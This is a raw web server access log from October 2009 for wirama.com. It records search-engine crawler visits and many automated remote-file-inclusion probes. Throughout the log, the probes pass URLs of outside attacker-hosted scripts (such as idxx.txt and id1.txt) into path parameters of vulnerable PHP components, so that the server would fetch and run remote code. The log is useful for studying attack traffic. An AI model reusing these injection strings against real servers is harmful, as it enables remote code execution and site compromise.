61.100.5.136 - - [03/Oct/2009:03:33:34 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.sosdety.ru/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:03:34:26 -0700] "GET /logs/access_090330.log//modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.215.230.160 - - [03/Oct/2009:03:34:26 -0700] "GET /modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.215.230.160 - - [03/Oct/2009:03:34:26 -0700] "GET /logs//modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.215.230.160 - - [03/Oct/2009:03:35:07 -0700] "GET /logs/access_090331.log//modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.100.5.136 - - [03/Oct/2009:03:35:38 -0700] "GET /logs/access_090601.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.sosdety.ru/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.100.5.136 - - [03/Oct/2009:03:35:41 -0700] "GET /logs/access_090601.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.sosdety.ru/enda-id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:03:36:43 -0700] "GET /modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.215.230.160 - - [03/Oct/2009:03:36:44 -0700] "GET /logs/access_090330.log//modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.215.230.160 - - [03/Oct/2009:03:36:44 -0700] "GET /logs//modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
123.215.230.160 - - [03/Oct/2009:03:37:10 -0700] "GET /logs/access_090331.log//modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.186.64.229 - - [03/Oct/2009:03:42:59 -0700] "GET /logs/access_090601.log//modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.130.29.11 - - [03/Oct/2009:03:51:48 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moncosZ.fileave.com/pirid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.130.29.11 - - [03/Oct/2009:03:51:57 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moncosZ.fileave.com/pirid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.130.29.11 - - [03/Oct/2009:03:51:57 -0700] "GET /logs/access_090301.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moncosZ.fileave.com/pirid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:03:54:55 -0700] "GET /logs/access_090601.log//modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.130.29.11 - - [03/Oct/2009:03:56:30 -0700] "GET /logs/access_090301.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moncosZ.fileave.com/pirid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.130.29.11 - - [03/Oct/2009:03:56:30 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moncosZ.fileave.com/pirid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.130.29.11 - - [03/Oct/2009:03:56:30 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://moncosZ.fileave.com/pirid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:04:05:03 -0700] "GET /logs/access_090601.log//modules/myalbum/admin/export.php?XOOPS_ROOT_PATH=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.11.145.8 - - [03/Oct/2009:04:21:53 -0700] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
72.11.145.8 - - [03/Oct/2009:04:21:53 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pengecutes.fileave.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.106.187 - - [03/Oct/2009:04:28:38 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.59 - - [03/Oct/2009:04:37:36 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.59 - - [03/Oct/2009:04:37:37 -0700] "GET /logs/access_090501.log HTTP/1.1" 200 1310720 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
174.34.157.98 - - [03/Oct/2009:04:55:42 -0700] "GET /logs/access_090531.log HTTP/1.1" 206 3145728 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt\\)" "www.wirama.com"
174.34.157.98 - - [03/Oct/2009:04:55:43 -0700] "GET /logs/access_090531.log HTTP/1.1" 206 1048576 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
65.55.106.187 - - [03/Oct/2009:04:59:45 -0700] "GET /_private/?N=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
193.47.80.37 - - [03/Oct/2009:05:03:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
193.47.80.37 - - [03/Oct/2009:05:03:59 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
65.55.207.47 - - [03/Oct/2009:05:05:32 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
121.130.29.11 - - [03/Oct/2009:05:26:12 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nav6.org/nc??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
121.130.29.11 - - [03/Oct/2009:05:26:12 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.nav6.org/nc??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.207.47 - - [03/Oct/2009:05:37:50 -0700] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
61.135.134.235 - - [03/Oct/2009:05:38:07 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [03/Oct/2009:05:38:07 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.235 - - [03/Oct/2009:05:38:07 -0700] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.215 - - [03/Oct/2009:05:38:08 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.215 - - [03/Oct/2009:05:38:08 -0700] "GET /logs/access_090601.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.215 - - [03/Oct/2009:05:38:08 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.22.21.3 - - [03/Oct/2009:05:39:42 -0700] "GET /logs/access_090531.log//?sIncPath=http://03f163.wisegiga.net:8000/bbs///casper/ps/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
195.22.21.3 - - [03/Oct/2009:05:39:42 -0700] "GET /?sIncPath=http://03f163.wisegiga.net:8000/bbs///casper/ps/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
195.22.21.3 - - [03/Oct/2009:05:39:42 -0700] "GET /logs//?sIncPath=http://03f163.wisegiga.net:8000/bbs///casper/ps/id1.txt?? HTTP/1.1" 200 3142 "-" "Mozilla/5.0" "www.wirama.com"
61.135.134.235 - - [03/Oct/2009:05:40:39 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.215 - - [03/Oct/2009:05:41:27 -0700] "GET /logs/access_090301.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kim-key.cn/bbs/data/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
86.87.211.5 - - [03/Oct/2009:06:19:04 -0700] "GET /logs/ HTTP/1.1" 200 3137 "http://www.governmentsecurity.org/forum/index.php?showtopic=32055" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
86.87.211.5 - - [03/Oct/2009:06:19:05 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
86.87.211.5 - - [03/Oct/2009:06:19:08 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
86.87.211.5 - - [03/Oct/2009:06:19:14 -0700] "GET /logs/access_081231.log HTTP/1.1" 200 303093 "http://www.wirama.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" "www.wirama.com"
65.55.208.52 - - [03/Oct/2009:06:30:49 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.52 - - [03/Oct/2009:06:30:51 -0700] "GET /logs/access_090531.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
81.12.13.152 - - [03/Oct/2009:06:38:24 -0700] "GET /logs/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [03/Oct/2009:06:38:24 -0700] "GET /logs/access_090401.log/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [03/Oct/2009:06:38:24 -0700] "GET /errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [03/Oct/2009:06:40:32 -0700] "GET /logs/access_090601.log/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.78.215 - - [03/Oct/2009:06:59:06 -0700] "GET /?S=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
67.16.94.2 - - [03/Oct/2009:07:08:19 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.wirama.com"
67.16.94.2 - - [03/Oct/2009:07:08:20 -0700] "GET / HTTP/1.0" 200 900 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.wirama.com"
78.138.113.47 - - [03/Oct/2009:07:10:51 -0700] "GET /logs/access_090601.log//components/com_simpleboard/image_upload.php?sbp=http://mips.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [03/Oct/2009:07:10:51 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://mips.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [03/Oct/2009:07:10:51 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://mips.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
78.138.113.47 - - [03/Oct/2009:07:11:00 -0700] "GET /logs/access_090331.log//components/com_simpleboard/image_upload.php?sbp=http://mips.interfree.it/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.250.230.32 - - [03/Oct/2009:07:18:05 -0700] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "wirama.com"
65.55.207.69 - - [03/Oct/2009:07:38:23 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.78.215 - - [03/Oct/2009:07:46:00 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
195.186.64.229 - - [03/Oct/2009:07:51:46 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.karuturi.com/baner.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [03/Oct/2009:07:51:47 -0700] "GET /logs/access_090601.log//components/com_simpleboard/image_upload.php?sbp=http://www.karuturi.com/baner.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [03/Oct/2009:07:51:47 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.karuturi.com/baner.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [03/Oct/2009:07:51:52 -0700] "GET /logs/access_090331.log//components/com_simpleboard/image_upload.php?sbp=http://www.karuturi.com/baner.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.78.215 - - [03/Oct/2009:07:53:43 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.208.52 - - [03/Oct/2009:07:56:18 -0700] "GET /logs/access_090701.log HTTP/1.1" 200 1114112 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
69.64.56.6 - - [03/Oct/2009:07:59:48 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Qseero v1.0.0" "www.wirama.com"
69.64.56.6 - - [03/Oct/2009:07:59:48 -0700] "GET / HTTP/1.0" 200 900 "-" "Qseero v1.0.0" "www.wirama.com"
89.188.106.38 - - [03/Oct/2009:08:14:03 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.brembobrakesonline.co.uk/includes/nGagLiks/Files/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
89.188.106.38 - - [03/Oct/2009:08:14:04 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.brembobrakesonline.co.uk/includes/nGagLiks/Files/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
89.188.106.38 - - [03/Oct/2009:08:14:04 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.brembobrakesonline.co.uk/includes/nGagLiks/Files/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.69 - - [03/Oct/2009:08:14:16 -0700] "GET /logs/ HTTP/1.1" 200 3137 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
81.12.13.152 - - [03/Oct/2009:08:22:14 -0700] "GET /logs/access_090601.log//components/com_simpleboard/image_upload.php?sbp=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [03/Oct/2009:08:22:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [03/Oct/2009:08:22:14 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
81.12.13.152 - - [03/Oct/2009:08:22:19 -0700] "GET /logs/access_090331.log//components/com_simpleboard/image_upload.php?sbp=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [03/Oct/2009:08:27:50 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [03/Oct/2009:08:27:50 -0700] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.242.37.212 - - [03/Oct/2009:08:27:50 -0700] "GET //administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.golf-dieppe.com/nGagLiks/File/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.15.108.170 - - [03/Oct/2009:08:49:52 -0700] "GET /logs/access_090801.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.15.108.170 - - [03/Oct/2009:08:49:52 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.15.108.170 - - [03/Oct/2009:08:49:52 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [03/Oct/2009:08:55:41 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [03/Oct/2009:08:55:41 -0700] "GET /logs/access_090801.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.186.64.229 - - [03/Oct/2009:08:55:41 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.132.20 - - [03/Oct/2009:09:09:56 -0700] "GET /login.php?dir=http://03f163.wisegiga.net:8000/bbs///casper/ps/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.132.20 - - [03/Oct/2009:09:09:56 -0700] "GET /logs//login.php?dir=http://03f163.wisegiga.net:8000/bbs///casper/ps/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.132.20 - - [03/Oct/2009:09:09:58 -0700] "GET /logs/access_090601.log//login.php?dir=http://03f163.wisegiga.net:8000/bbs///casper/ps/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.132.20 - - [03/Oct/2009:09:09:58 -0700] "GET /login.php?dir=http://03f163.wisegiga.net:8000/bbs///casper/ps/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.132.20 - - [03/Oct/2009:09:09:58 -0700] "GET /logs//login.php?dir=http://03f163.wisegiga.net:8000/bbs///casper/ps/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.126.132.20 - - [03/Oct/2009:09:10:00 -0700] "GET /logs/access_090601.log//login.php?dir=http://03f163.wisegiga.net:8000/bbs///casper/ps/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:09:12:18 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:09:12:18 -0700] "GET /logs/access_090801.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:09:12:18 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:09:12:24 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:09:12:24 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
123.215.230.160 - - [03/Oct/2009:09:12:24 -0700] "GET /logs/access_090801.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.50 - - [03/Oct/2009:09:28:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [03/Oct/2009:09:28:08 -0700] "GET /_private/?S=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
124.115.6.13 - - [03/Oct/2009:09:34:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://www.wirama.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.wirama.com"
67.205.103.171 - - [03/Oct/2009:10:01:17 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.205.103.171 - - [03/Oct/2009:10:01:17 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.205.103.171 - - [03/Oct/2009:10:01:17 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.205.103.171 - - [03/Oct/2009:10:01:18 -0700] "GET /logs/access_090401.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
219.94.179.212 - - [03/Oct/2009:10:10:38 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://www.sjobergsbygg.nu/new/cmd????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "wirama.com"
220.125.237.35 - - [03/Oct/2009:10:10:55 -0700] "GET /logs/access_090601.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:10:10:55 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
220.125.237.35 - - [03/Oct/2009:10:10:55 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 200 3143 "-" "Mozilla/5.0" "wirama.com"
65.55.207.96 - - [03/Oct/2009:10:11:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.78.215 - - [03/Oct/2009:10:15:27 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.106.186 - - [03/Oct/2009:10:34:51 -0700] "GET /?M=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
207.58.152.241 - - [03/Oct/2009:10:40:06 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.152.241 - - [03/Oct/2009:10:40:06 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.58.152.241 - - [03/Oct/2009:10:40:07 -0700] "GET /logs/access_090330.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.207.96 - - [03/Oct/2009:10:48:54 -0700] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.49 - - [03/Oct/2009:10:58:52 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.49 - - [03/Oct/2009:10:58:52 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.49 - - [03/Oct/2009:10:58:56 -0700] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
220.125.237.35 - - [03/Oct/2009:11:09:19 -0700] "GET /logs/access_090801.log///?_SERVER[DOCUMENT_ROOT]=http://speha.com/modules/gallery2/modules/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
